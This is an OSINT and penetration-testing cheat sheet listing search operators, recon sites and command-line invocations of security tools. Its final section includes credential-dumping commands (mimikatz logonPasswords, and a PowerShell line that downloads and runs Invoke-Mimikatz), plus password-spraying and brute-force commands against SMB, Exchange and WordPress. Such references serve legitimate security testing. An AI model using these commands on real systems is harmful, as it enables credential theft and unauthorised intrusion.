OSINT CheatSheet
OSINT CheatSheet
Advanced Search
site:target.com
inurl:target.com
Google
filetype:pdf
AND, OR, - , “”
ip:<ip_address>
Bing
feed:osint
osint date=20140808..20140810
Yandex lang:en
osint mime:pdf
Reverse IP lookup yougetsignal.com
Domain
Domain IP history http://viewdns.info/iphistory/?domain=<domainname>
DNS Records https://mxtoolbox.com/SuperTool.aspx
nslookup nslookup reconvillage.org all
dig reconvillage.org
dig
dig reconvillage.org cname
Addons
- Buildwith
Web Technology Profiling - Wappalyzer
Job Portals
Forums (stackoverflow, etc)
SubDomain Search
DNS Dumpster dnsdumpster.com
Wolframalpha www.wolframalpha.com/input/?i=uber.com
Netcraft searchdns.netcraft.com
Censys censys.io/ipv4?q=uber.com
Shodan www.shodan.io/search?query=uber.com
crt.sh crt.sh/?q=%uber.com
sublist3r python sublist3r.py -d uber.com -t 50 -b -p 80,443,21,22
massdns massdns -r lists/resolvers.txt -t AAAA domains.txt
Company Name
Zoominfo zoominfo.com
Glassdoor glassdoor.com
Hoovers hoovers.com
Crunchbase crunchbase.com
Email ID
Social Profiles dashboard.clearbit.com/lookup
Slides www.slideshare.net/search/slideshow?q=<email_id>
haveibeenpwned.com
Breach status publicdbhost.dmca.gripe
@dumpmon - twitter.com/dumpmon
Github search
Github Gist search
Source Code aggregators
If search not available, use Google dorks. Example-
site:bitbucket.org intext:osint
pastebin.com
psbdmp.com
Paste websites pastie.org
Google Custom Search Engine
https://inteltechniques.com/osint/pastebins.html
Email Sherlock www.emailsherlock.com
Username
Tweets from a location twimap.com
Check usernames https://gaddr.me/search?type=profiles&q=upgoingstar
Facebook OSINT https://inteltechniques.com/osint/facebook.html
redditsearch.io
Reddit OSINT
reditr.com
sleepingtime.org
Twitter OSINT crowdriff.com/riffle/
tinfoleak.com
keybase.io
Verified Information
Rapportive
People Full Name
XYZ Advanced Google Search Operator
ABC ABC XYZ
IP Address
whois -h whois.radb.net -T route <IP>
IP whois whois -h whois.radb.net -- -i origin <ASN-ID> | grep -Eo
"([0-9.]+){4}/[0-9]+" | sort -n | uniq -c
ASN ID nmap --script targets-asn --script-args targets-asn.asn=<ASN-ID>
VirusTotal virustotal.com
Robtex robtex.com
threatfeeds.io
ThreatIntel Feeds
http://thecyberthreat.com/cyber-threat-intelligence-feeds/
Shodan shodan.io
Censys censys.io
Zoomeye zoomeye.org
SecurityTrails securitytrails.com
Hurricane Labs http://bgp.he.net/dns/
> mimikatz.exe
mimikatz > mimikatz # privilege::debug
> mimikatz # sekurlsa::logonPasswords full
$ python3 ghdb_scraper.py -j -s
pagodo $ python3 pagodo.py -g google_dorks_20190312_103108.txt -d
example.com
$ python passwordgen.py exampleuser
password_gen
$ python passwordgen_fromfile.py examplefile.txt
PDF-tools $ python pdf-parser.py pdffile.pdf
> IEX (New-Object
PowerSploit (powershell)
System.Net.Webclient).DownloadString('https://raw.githubuserco
ntent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Inv
oke-Mimikatz.ps1'); Invoke-Mimikatz
$ ./recon-ng
recon-ng
Set API keys beforehand
robo3t $ ./robo3t
$ ./ruler-linux32 --url
ruler http://autodiscover.example.com/autodiscover/autodiscover.xml
brute --users users.txt --passwords password.txt
S3Scanner $ python ./s3scanner.py names.txt
ScoutSuite $ python Scout.py -h
set $ sudo ./setoolkit
$ python3 spaces_finder.py -l SpacesNames_list.txt -g
spaces-finder
interesting_keywords_list.txt -D -m 500000 -d 1 -t 5
$ ./sf.py
spiderfoot
Visit http://127.0.0.1:5001
$ spray.sh -smb 192.168.0.5 users.txt passwords.txt 1 35
Spray
InternamDomain
Sticky-Keys-Slayer $ ./stickyKeysSlayer.sh -v 192.168.0.10
subbrute $ ./subbrute.py -p example.com
Sublist3r $ python sublist3r.py -d example.com
TekDefense-Automater $ python Automater.py 8.8.8.8
theHarvester $ ./theHarvester.py -d example.com
$ ./tinfoleak.py
tinfoleak
Configure twitter auth keys in tinfoleak.conf
TorBrowser $ ./start-tor-browser.desktop
$ trufflehog --regex --entropy=False
truffleHog
https://github.com/redhuntlabs/RedHunt-OS.git
Turbolist3r $ python turbolist3r.py -d example.com
$ python tweetmonitor.py -k osint
TweetMonitor
Configure twitter auth keys in the code tweetmonitor.py
tweets_analyzer $ ./tweets_analyzer.py -n sudhanshu_c
username-anarchy $ ./username-anarchy john doe
webscreenshot $ python webscreenshot.py -i url_list.txt
wordlists Common username, password and subdomain lists
$ python wpforce.py -i usr.txt -w pass.txt -u
WPForce
"http://blog.example.com"
ZAP_2.7.0 $ ./zap.sh